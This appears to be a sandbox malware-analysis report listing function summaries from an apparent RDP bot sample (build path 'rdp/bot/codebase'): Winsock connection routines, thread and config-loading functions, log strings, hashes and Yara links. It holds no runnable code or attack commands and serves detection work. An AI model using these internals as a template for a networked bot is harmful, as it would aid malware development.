String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 1af0a60acd5ccf9b54b11c4024afb91885eb9b6538cd05742696de47e21a07a6
Instruction ID: d6884e8fa3b582024c65938b98894fb9bb1181dec41887f412d5a83290252f99
Opcode Fuzzy Hash: 1af0a60acd5ccf9b54b11c4024afb91885eb9b6538cd05742696de47e21a07a6
Instruction Fuzzy Hash: 6551C66BB0E68AC1E662DF55E82037D2691AF86F60F044335ED2E467D7DE3CE5458308

Function 00007FFDAC0F42EC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFDAC0F4310
htonl.WS2_32 ref: 00007FFDAC0F43AC
htons.WS2_32 ref: 00007FFDAC0F43BD
connect.WS2_32 ref: 00007FFDAC0F43D6
WSAGetLastError.WS2_32 ref: 00007FFDAC0F43FC
select.WS2_32 ref: 00007FFDAC0F446C
WSAGetLastError.WS2_32 ref: 00007FFDAC0F447C
WSAGetLastError.WS2_32 ref: 00007FFDAC0F44BE

Part of subcall function 00007FFDAC0F3F89: ioctlsocket.WS2_32 ref: 00007FFDAC0F3FAF

Part of subcall function 00007FFDAC0F3ED4: setsockopt.WS2_32 ref: 00007FFDAC0F3EFC
Part of subcall function 00007FFDAC0F3ED4: setsockopt.WS2_32 ref: 00007FFDAC0F3F28

WSAGetLastError.WS2_32 ref: 00007FFDAC0F44EB

Strings

[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDAC0F44DA
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFDAC0F4374
tcp_connect, xrefs: 00007FFDAC0F436D, 00007FFDAC0F4488, 00007FFDAC0F44A6, 00007FFDAC0F44D3, 00007FFDAC0F44FC, 00007FFDAC0F4526
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFDAC0F452D
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFDAC0F44AD
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDAC0F4503
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDAC0F448F

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 4b3114bb8f1a0e19b7ba76fb0e8f772d0eaf8da3374d707c85de736b9ef179c3
Instruction ID: c0ddb0e8822d51d20ee202e27e0348a20556cdce9f5c8433fe629f1e30f1cf50
Opcode Fuzzy Hash: 4b3114bb8f1a0e19b7ba76fb0e8f772d0eaf8da3374d707c85de736b9ef179c3
Instruction Fuzzy Hash: A151E122B0F64381EA209B59E8202796290FF847F0F584736E86D427D7DFBCE595934C

Function 00007FFDA5575A3C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFDA5575A60
htonl.WS2_32 ref: 00007FFDA5575AFC
htons.WS2_32 ref: 00007FFDA5575B0D
connect.WS2_32 ref: 00007FFDA5575B26
WSAGetLastError.WS2_32 ref: 00007FFDA5575B4C
select.WS2_32 ref: 00007FFDA5575BBC
WSAGetLastError.WS2_32 ref: 00007FFDA5575BCC
WSAGetLastError.WS2_32 ref: 00007FFDA5575C0E

Part of subcall function 00007FFDA55756D9: ioctlsocket.WS2_32 ref: 00007FFDA55756FF

Part of subcall function 00007FFDA5575624: setsockopt.WS2_32 ref: 00007FFDA557564C
Part of subcall function 00007FFDA5575624: setsockopt.WS2_32 ref: 00007FFDA5575678

WSAGetLastError.WS2_32 ref: 00007FFDA5575C3B

Strings

[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFDA5575C7D
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA5575BDF
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFDA5575BFD
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDA5575C53
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDA5575C2A
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFDA5575AC4
tcp_connect, xrefs: 00007FFDA5575ABD, 00007FFDA5575BD8, 00007FFDA5575BF6, 00007FFDA5575C23, 00007FFDA5575C4C, 00007FFDA5575C76

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: de2d5cbdf5353413bc1c648729311be83d8657ff32f246b9fa5e0b3037bf1a6c
Instruction ID: d7c902642072cb699e677791551143b58bed0886583037a640062ede6e87f3a5
Opcode Fuzzy Hash: de2d5cbdf5353413bc1c648729311be83d8657ff32f246b9fa5e0b3037bf1a6c
Instruction Fuzzy Hash: 4351E629B0E65B82E7225F14A86037A2690AF67F60F500735D92D477E7EF7CE5088708

Function 00007FFDAC12175C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFDAC121780
htonl.WS2_32 ref: 00007FFDAC12181C
htons.WS2_32 ref: 00007FFDAC12182D
connect.WS2_32 ref: 00007FFDAC121846
WSAGetLastError.WS2_32 ref: 00007FFDAC12186C
select.WS2_32 ref: 00007FFDAC1218DC
WSAGetLastError.WS2_32 ref: 00007FFDAC1218EC
WSAGetLastError.WS2_32 ref: 00007FFDAC12192E

Part of subcall function 00007FFDAC1213F9: ioctlsocket.WS2_32 ref: 00007FFDAC12141F

Part of subcall function 00007FFDAC121344: setsockopt.WS2_32 ref: 00007FFDAC12136C
Part of subcall function 00007FFDAC121344: setsockopt.WS2_32 ref: 00007FFDAC121398

WSAGetLastError.WS2_32 ref: 00007FFDAC12195B

Strings

[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDAC12194A
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFDAC12199D
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDAC1218FF
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFDAC1217E4
tcp_connect, xrefs: 00007FFDAC1217DD, 00007FFDAC1218F8, 00007FFDAC121916, 00007FFDAC121943, 00007FFDAC12196C, 00007FFDAC121996
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFDAC12191D
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDAC121973

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 8c389301406f169cc07bf59ee58e6666b8cd02130e6e3338fa2688858316811d
Instruction ID: d31eb3af9492da219be6e18777db012e3e86cb192eb912e4c6cb3f3e705c3b88
Opcode Fuzzy Hash: 8c389301406f169cc07bf59ee58e6666b8cd02130e6e3338fa2688858316811d
Instruction Fuzzy Hash: 68510867B0E64381E7229B15E8203BA6690EF817F8F240335E86D477D7DE3DE8058709

Function 00007FFDA55AA7B8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA55AA7D3
CreateThread.KERNEL32 ref: 00007FFDA55AA813
GetLastError.KERNEL32 ref: 00007FFDA55AA85B
GetLastError.KERNEL32 ref: 00007FFDA55AA933

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

~, xrefs: 00007FFDA55AA8D9
, xrefs: 00007FFDA55AA879
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFDA55AA86D
ebus_init, xrefs: 00007FFDA55AA840, 00007FFDA55AA866, 00007FFDA55AA93E, 00007FFDA55AAA33
Done, xrefs: 00007FFDA55AAA2C
[I] (%s) -> %s, xrefs: 00007FFDA55AAA3A
, xrefs: 00007FFDA55AA951
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFDA55AA945
P, xrefs: 00007FFDA55AA9AB
~, xrefs: 00007FFDA55AA9A6
P, xrefs: 00007FFDA55AA8E2
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55AA847

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 0aefdcde693bddb611edd44b3ad8701c3f1d8df804145e3df866cb1fd0c990e5
Instruction ID: 8b616aa337548f112a1d914a79513a29c1f8ee65d656e895956eefef6fe37e2b
Opcode Fuzzy Hash: 0aefdcde693bddb611edd44b3ad8701c3f1d8df804145e3df866cb1fd0c990e5
Instruction Fuzzy Hash: 3851EF18F0E60F85FB324F14D4B837952909F07B25F514A36C66D053E3EE6EE946C259

Function 00007FFDA55D17F8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA55D1813
CreateThread.KERNEL32 ref: 00007FFDA55D1853
GetLastError.KERNEL32 ref: 00007FFDA55D189B
GetLastError.KERNEL32 ref: 00007FFDA55D1973

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

ebus_init, xrefs: 00007FFDA55D1880, 00007FFDA55D18A6, 00007FFDA55D197E, 00007FFDA55D1A73
P, xrefs: 00007FFDA55D1922
~, xrefs: 00007FFDA55D1919
Done, xrefs: 00007FFDA55D1A6C
[I] (%s) -> %s, xrefs: 00007FFDA55D1A7A
, xrefs: 00007FFDA55D18B9
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55D1887
~, xrefs: 00007FFDA55D19E6
, xrefs: 00007FFDA55D1991
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFDA55D1985
P, xrefs: 00007FFDA55D19EB
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFDA55D18AD

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: adcc1ee1f53cf1c228e0c3686a888ec28b5ef521e519b6c1113744f51f24eeaf
Instruction ID: 549c4f5b7d33aa6a2646a7a8d745508828484459a84ecbe33d10b50877785e0f
Opcode Fuzzy Hash: adcc1ee1f53cf1c228e0c3686a888ec28b5ef521e519b6c1113744f51f24eeaf
Instruction Fuzzy Hash: 6C510A2BF0E78BCAF622DF54A4A037812509F07B64F244232C96E463E79E5DA995C24D

Function 00007FFDAC0F2B78 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDAC0F2B93
CreateThread.KERNEL32 ref: 00007FFDAC0F2BD3
GetLastError.KERNEL32 ref: 00007FFDAC0F2C1B
GetLastError.KERNEL32 ref: 00007FFDAC0F2CF3

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

Strings

, xrefs: 00007FFDAC0F2D11
[I] (%s) -> %s, xrefs: 00007FFDAC0F2DFA
ebus_init, xrefs: 00007FFDAC0F2C00, 00007FFDAC0F2C26, 00007FFDAC0F2CFE, 00007FFDAC0F2DF3
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFDAC0F2C2D
~, xrefs: 00007FFDAC0F2D66
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFDAC0F2D05
P, xrefs: 00007FFDAC0F2CA2
Done, xrefs: 00007FFDAC0F2DEC
~, xrefs: 00007FFDAC0F2C99
, xrefs: 00007FFDAC0F2C39
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC0F2C07
P, xrefs: 00007FFDAC0F2D6B

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 18749ea8e54ff38a3d6f540356451a6bd12c8bb3744cee5c53612f92e5bab22b
Instruction ID: 7c734df898682b79db8db3e18c911a642bc94a5bf09fe0ea9a2cb3ad34c39f0e
Opcode Fuzzy Hash: 18749ea8e54ff38a3d6f540356451a6bd12c8bb3744cee5c53612f92e5bab22b
Instruction Fuzzy Hash: BA511B21B0F74389FA215B44A8E43792294AF043F4F240232C97D463E7DF6DE8E5A29D

Function 00007FFDA55717F8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA5571813
CreateThread.KERNEL32 ref: 00007FFDA5571853
GetLastError.KERNEL32 ref: 00007FFDA557189B
GetLastError.KERNEL32 ref: 00007FFDA5571973

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

, xrefs: 00007FFDA55718B9
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA5571887
ebus_init, xrefs: 00007FFDA5571880, 00007FFDA55718A6, 00007FFDA557197E, 00007FFDA5571A73
P, xrefs: 00007FFDA5571922
~, xrefs: 00007FFDA5571919
Done, xrefs: 00007FFDA5571A6C
P, xrefs: 00007FFDA55719EB
~, xrefs: 00007FFDA55719E6
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFDA55718AD
[I] (%s) -> %s, xrefs: 00007FFDA5571A7A
, xrefs: 00007FFDA5571991
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFDA5571985

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 07f72c3b8b9488efb92cddfd367c0e8c4ae3d51ddbf75a6cd52b37289039b883
Instruction ID: 502ca39f07c77de7c1bd73b4828666f3b0f975ceb0ce8f67b38bdcc011f62c83
Opcode Fuzzy Hash: 07f72c3b8b9488efb92cddfd367c0e8c4ae3d51ddbf75a6cd52b37289039b883
Instruction Fuzzy Hash: 18511E28F0E70B85F7225F54A4A037812509F07F64F644B36C56E067E3FF6DA985924D

Function 00007FFDAC1264F8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDAC126513
CreateThread.KERNEL32 ref: 00007FFDAC126553
GetLastError.KERNEL32 ref: 00007FFDAC12659B
GetLastError.KERNEL32 ref: 00007FFDAC126673

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

, xrefs: 00007FFDAC126691
[I] (%s) -> %s, xrefs: 00007FFDAC12677A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFDAC1265AD
~, xrefs: 00007FFDAC1266E6
~, xrefs: 00007FFDAC126619
P, xrefs: 00007FFDAC126622
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC126587
ebus_init, xrefs: 00007FFDAC126580, 00007FFDAC1265A6, 00007FFDAC12667E, 00007FFDAC126773
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFDAC126685
P, xrefs: 00007FFDAC1266EB
Done, xrefs: 00007FFDAC12676C
, xrefs: 00007FFDAC1265B9

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 6fa0ebc06db686e59de84f53dfcc884bfb6d9f6c9c983a3cd456ffb907efceae
Instruction ID: 8c3f5491bce0585cb3f091c0fb96a832e75eddfacea02adf542e2b39286b9c9c
Opcode Fuzzy Hash: 6fa0ebc06db686e59de84f53dfcc884bfb6d9f6c9c983a3cd456ffb907efceae
Instruction Fuzzy Hash: 3D510C6EF0EB03C2F6675714A5A43781290AF243F8FA44736C56E063E7DE6DE845824E

Function 00007FF70CAD3452 Relevance: 27.2, APIs: 7, Strings: 11, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70CAE8500,00000000,00000000), ref: 00007FF70CAD349D
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70CAE8500,00000000,00000000), ref: 00007FF70CAD34AE

Part of subcall function 00007FF70CAD4FC5: fopen.MSVCRT ref: 00007FF70CAD500A
Part of subcall function 00007FF70CAD4FC5: fseek.MSVCRT ref: 00007FF70CAD5029
Part of subcall function 00007FF70CAD4FC5: _errno.MSVCRT ref: 00007FF70CAD503D
Part of subcall function 00007FF70CAD4FC5: _errno.MSVCRT ref: 00007FF70CAD5058

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70CAE8500,00000000,00000000), ref: 00007FF70CAD35DA
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70CAE8500,00000000,00000000), ref: 00007FF70CAD35EB
strncpy.MSVCRT ref: 00007FF70CAD372C
strncpy.MSVCRT ref: 00007FF70CAD3743
strncpy.MSVCRT ref: 00007FF70CAD37A2

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

NULL, xrefs: 00007FF70CAD37F2
5, xrefs: 00007FF70CAD3505
[I] (%s) -> Done(path=%s), xrefs: 00007FF70CAD3808
ini_load, xrefs: 00007FF70CAD34DF, 00007FF70CAD351B, 00007FF70CAD3801
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD3522
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD34E6
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF70CAD363A
mem_alloc, xrefs: 00007FF70CAD3633
(path != NULL), xrefs: 00007FF70CAD3514
service, xrefs: 00007FF70CAD345D
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF70CAD350D

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
